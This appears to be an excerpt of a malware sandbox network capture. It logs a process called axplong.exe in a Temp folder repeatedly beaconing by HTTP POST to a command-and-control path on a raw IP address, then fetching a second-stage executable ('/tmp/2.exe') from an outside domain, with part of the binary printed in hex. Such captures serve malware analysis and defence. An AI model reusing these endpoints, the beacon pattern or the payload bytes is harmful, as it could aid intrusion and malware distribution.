Jul 26, 2024 20:58:52.299247980 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:52.559371948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49752	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:52.680330038 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:53.421619892 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:53.422672987 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:53.669347048 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49753	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:53.790009022 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:54.554902077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:54.555740118 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:54.813822985 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49754	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:54.939399004 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:55.707354069 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:55.708503008 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:55.966603994 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49755	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:56.155086994 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:57.120600939 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:57.121450901 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:57.417993069 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49756	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:57.691382885 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:58.480444908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:58.481404066 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:58.737903118 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49757	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:58:58.853769064 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:58:59.614526033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:58:59.659729958 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:58:59.935074091 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.5	49758	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:00.053608894 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:00.882988930 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:00.883805037 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:59:01.130669117 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.5	49759	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:01.253515959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:02.042599916 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:02.044651985 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:59:02.294167042 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.5	49760	185.215.113.16	80	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 20:59:02.409493923 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 20:59:03.197381973 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 20:59:03.201111078 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 43 46 41 41 34 34 34 43 43 46 42 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CCFAA444CCFBFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Jul 26, 2024 20:59:03.457312107 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 18:59:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49713	58.65.168.132	443	5720	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:58:05 UTC	45	OUT	GET /tmp/2.exe HTTP/1.1 Host: atlpvt.com
2024-07-26 18:58:05 UTC	257	IN	HTTP/1.1 200 OK Date: Fri, 26 Jul 2024 18:58:05 GMT Server: Apache Last-Modified: Fri, 26 Jul 2024 18:55:02 GMT Accept-Ranges: bytes Content-Length: 239616 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: application/x-msdownload
2024-07-26 18:58:05 UTC	7935	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 40 67 94 73 04 06 fa 20 04 06 fa 20 04 06 fa 20 6b 70 51 20 1f 06 fa 20 6b 70 64 20 14 06 fa 20 6b 70 50 20 60 06 fa 20 0d 7e 69 20 0f 06 fa 20 04 06 fb 20 76 06 fa 20 6b 70 55 20 05 06 fa 20 6b 70 60 20 05 06 fa 20 6b 70 67 20 05 06 fa 20 52 69 63 68 04 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 80 bc 79 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 d4 01 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$@gs kpQ kpd kpP ` ~i v kpU kp` kpg Rich PELyd
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 81 8d f0 fd ff ff 00 01 00 00 47 89 bd e4 fd ff ff 57 e9 0a fe ff ff c7 85 e8 fd ff ff 08 00 00 00 89 8d b8 fd ff ff eb 24 83 e8 73 0f 84 bd fc ff ff 48 48 0f 84 90 fe ff ff 83 e8 03 0f 85 b7 01 00 00 c7 85 b8 fd ff ff 27 00 00 00 f6 85 f0 fd ff ff 80 c7 85 e0 fd ff ff 10 00 00 00 0f 84 70 fe ff ff 8a 85 b8 fd ff ff 04 51 c6 85 d4 fd ff ff 30 88 85 d5 fd ff ff c7 85 d0 fd ff ff 02 00 00 00 e9 4c fe ff ff f7 c1 00 10 00 00 0f 85 52 fe ff ff 83 c3 04 f6 c1 20 74 18 89 9d d8 fd ff ff f6 c1 40 74 06 0f bf 43 fc eb 04 0f b7 43 fc 99 eb 13 8b 43 fc f6 c1 40 74 03 99 eb 02 33 d2 89 9d d8 fd ff ff f6 c1 40 74 1b 85 d2 7f 17 7c 04 85 c0 73 11 f7 d8 83 d2 00 f7 da 81 8d f0 fd ff ff 00 01 00 00 f7 85 f0 fd ff ff 00 90 00 00 8b da 8b f8 75 02 33 db 83 bd e8 fd ff ff Data Ascii: GW$sHH'pQ0LR t@tCCC@t3@t\|su3
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 11 08 ff 45 dc eb dd e8 6f 0a 00 00 89 06 c7 45 fc fe ff ff ff e8 15 00 00 00 83 fb 08 75 1f ff 77 64 53 ff 55 e0 59 eb 19 8b 5d 08 8b 7d d8 83 7d e4 00 74 08 6a 00 e8 a2 29 00 00 59 c3 53 ff 55 e0 59 83 fb 08 74 0a 83 fb 0b 74 05 83 fb 04 75 11 8b 45 d4 89 47 60 83 fb 08 75 06 8b 45 d0 89 47 64 33 c0 e8 bc ec ff ff c3 8b ff 55 8b ec 56 8b 75 08 56 e8 eb 31 00 00 59 83 f8 ff 75 10 e8 29 e6 ff ff c7 00 09 00 00 00 83 c8 ff eb 4d 57 ff 75 10 6a 00 ff 75 0c 50 ff 15 1c f1 41 00 8b f8 83 ff ff 75 08 ff 15 60 f0 41 00 eb 02 33 c0 85 c0 74 0c 50 e8 19 e6 ff ff 59 83 c8 ff eb 1b 8b c6 c1 f8 05 8b 04 85 60 4d 44 02 83 e6 1f c1 e6 06 8d 44 30 04 80 20 fd 8b c7 5f 5e 5d c3 6a 10 68 70 16 42 00 e8 f5 eb ff ff 8b 5d 08 83 fb fe 75 1b e8 c8 e5 ff ff 83 20 00 e8 ad e5 Data Ascii: EoEuwdSUY]}}tj)YSUYttuEG`uEGd3UVuV1Yu)MWujuPAu`A3tPY`MDD0 _^]jhpB]u
2024-07-26 18:58:06 UTC	8000	IN	Data Raw: 42 00 01 0f 85 dd 00 00 00 6a 0d e8 67 0b 00 00 59 83 65 fc 00 8b 43 04 a3 04 13 43 00 8b 43 08 a3 08 13 43 00 8b 43 0c a3 0c 13 43 00 33 c0 89 45 e4 83 f8 05 7d 10 66 8b 4c 43 10 66 89 0c 45 f8 12 43 00 40 eb e8 33 c0 89 45 e4 3d 01 01 00 00 7d 0d 8a 4c 18 1c 88 88 88 37 42 00 40 eb e9 33 c0 89 45 e4 3d 00 01 00 00 7d 10 8a 8c 18 1d 01 00 00 88 88 90 38 42 00 40 eb e6 ff 35 90 39 42 00 ff 15 4c f1 41 00 85 c0 75 13 a1 90 39 42 00 3d 68 35 42 00 74 07 50 e8 9e c8 ff ff 59 89 1d 90 39 42 00 53 ff d7 c7 45 fc fe ff ff ff e8 02 00 00 00 eb 30 6a 0d e8 e1 09 00 00 59 c3 eb 25 83 f8 ff 75 20 81 fb 68 35 42 00 74 07 53 e8 68 c8 ff ff 59 e8 94 c6 ff ff c7 00 16 00 00 00 eb 04 83 65 e0 00 8b 45 e0 e8 f8 cc ff ff c3 83 3d 4c 4d 44 02 00 75 12 6a fd e8 56 fe ff ff Data Ascii: BjgYeCCCCCC3E}fLCfEC@3E=}L7B@3E=}8B@59BLAu9B=h5BtPY9BSE0jY%u h5BtShYeE=LMDujV
